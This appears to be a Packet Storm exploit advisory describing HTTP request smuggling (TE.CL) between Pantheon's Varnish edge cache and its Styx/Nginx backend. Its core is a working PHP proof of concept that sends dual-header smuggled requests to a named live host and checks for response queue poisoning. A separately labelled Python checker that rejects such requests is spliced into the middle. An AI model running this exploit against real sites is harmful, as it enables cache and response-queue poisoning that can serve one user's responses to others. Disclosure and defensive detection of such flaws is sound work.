Description
Proof of concept exploit that demonstrates an HTTP request smuggling vulnerability between Varnish and Styx / Nginx...
Basic Information
ID
PACKETSTORM:213290
Published
Dec 24, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : HTTP Request Smuggling (TE.CL) via Edge Cache Misconfiguration (Varnish ↔ Styx) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://pantheon.io/ |
=============================================================================================================================================
[+] References :
[+] Summary : A critical HTTP Request Smuggling (TE.CL) vulnerability exists due to inconsistent HTTP request parsing
between the Pantheon edge caching layer (Varnish) and the backend routing layer (Styx / Nginx).
The edge layer accepts ambiguous requests containing both Content-Length and Transfer-Encoding,
while the backend correctly prioritizes Transfer-Encoding: chunked.
This discrepancy allows an attacker to smuggle arbitrary HTTP requests, resulting in response queue poisoning and potential web cache poisoning.
[+] Technical Details :
Frontend (Varnish Edge Cache)
  - Parses requests using Content-Length
  - Does not reject dual-header ambiguity (CL + TE)
Backend (Pantheon Styx / Nginx)
  - Prioritizes Transfer-Encoding: chunked
  - Leaves smuggled payload queued for the next request
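A framing check for the dual-header case described above, as an added example (not code from the advisory, Pantheon, Varnish or Nginx): it computes where the body ends under each interpretation and rejects the request before it is forwarded, which RFC 9112 section 6.1 permits. The sample request, the host app.example.test and all function names are constructed for illustration.

```python
# Added example; the request below is constructed and app.example.test is a placeholder.
SAMPLE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: app.example.test\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Length: 4\r\n"
    b"\r\n"
    b"0\r\n\r\n"
    b"GET /marker HTTP/1.1\r\nHost: app.example.test\r\n\r\n"
)

def parse_head(raw):
    """Split raw bytes into ({lowercased header name: [values]}, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, rest

def chunked_end(rest):
    """Offset in rest where a chunked body ends (after the last chunk and any trailers)."""
    pos = 0
    while True:
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            break
        pos += size + 2  # chunk data plus its CRLF
    while True:  # trailer section ends at an empty line
        eol = rest.index(b"\r\n", pos)
        if eol == pos:
            return pos + 2
        pos = eol + 2

def framing_verdict(raw):
    """Return (verdict, end offset by Content-Length, end offset by chunked decoding)."""
    headers, rest = parse_head(raw)
    lengths = set(headers.get(b"content-length", []))
    if len(lengths) > 1:
        return ("reject", None, None)  # conflicting Content-Length values
    if lengths and b"transfer-encoding" in headers:
        # Both framing headers present: the two layers on this page would each pick one.
        return ("reject", int(lengths.pop()), chunked_end(rest))
    return ("accept", None, None)

if __name__ == "__main__":
    verdict, cl_end, te_end = framing_verdict(SAMPLE)
    _, rest = parse_head(SAMPLE)
    print(verdict, "| next request by CL starts:", rest[cl_end:cl_end + 12])
    print(verdict, "| next request by TE starts:", rest[te_end:te_end + 12])
```

The two offsets differ for the sample, so a layer framing by Content-Length and a layer framing by chunked decoding place the start of the next request at different bytes on the same connection.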
[+] Vulnerability Class :
Desynchronization → Response Queue Poisoning → Cache Poisoning
[+] Proof of Concept (PoC)
The following PoC demonstrates request smuggling by injecting a benign smuggled request and observing its response being returned for a subsequent legitimate request.
[+] PoC : poc_final.php
<?php
/**
* Proof of Concept: HTTP Request Smuggling (TE.CL)
* Target: Pantheon-hosted application
*/
error_reporting(E_ALL);
$host = "www.bugcrowd.com"; // Pantheon-hosted example
$asset = "/etc/designs/bugcrowd/clientlibs/main.js";
$poc_mark = "PANTHEON_TECL_POC_" . rand(100, 999);
$fp = fsockopen("ssl://$host", 443, $errno, $errstr, 15);
if (!$fp) die("[-] Connection Failed: $errstr");
// Smuggled request
$smuggled = "GET /nonexistent-$poc_mark HTTP/1.1\r\n";
$smuggled .= "Host: $host\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";
// Main TE.CL request
$body = "0\r\n\r\n" . $smuggled;
$request = "POST / HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "Transfer-Encoding: chunked\r\n";
$request .= "Content-Length: 4\r\n";
$request .= "Connection: keep-alive\r\n\r\n";
$request .= $body;
fwrite($fp, $request);
usleep(600000);
// Trigger request
fwrite($fp, "GET $asset HTTP/1.1\r\nHost: $host\r\n\r\n");
$response = "";
while (!feof($fp)) {
    $response .= fgets($fp, 1024);
}
fclose($fp);
if (strpos($response, $poc_mark) !== false) {
    echo "[+] SUCCESS: Response queue poisoned via TE.CL.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================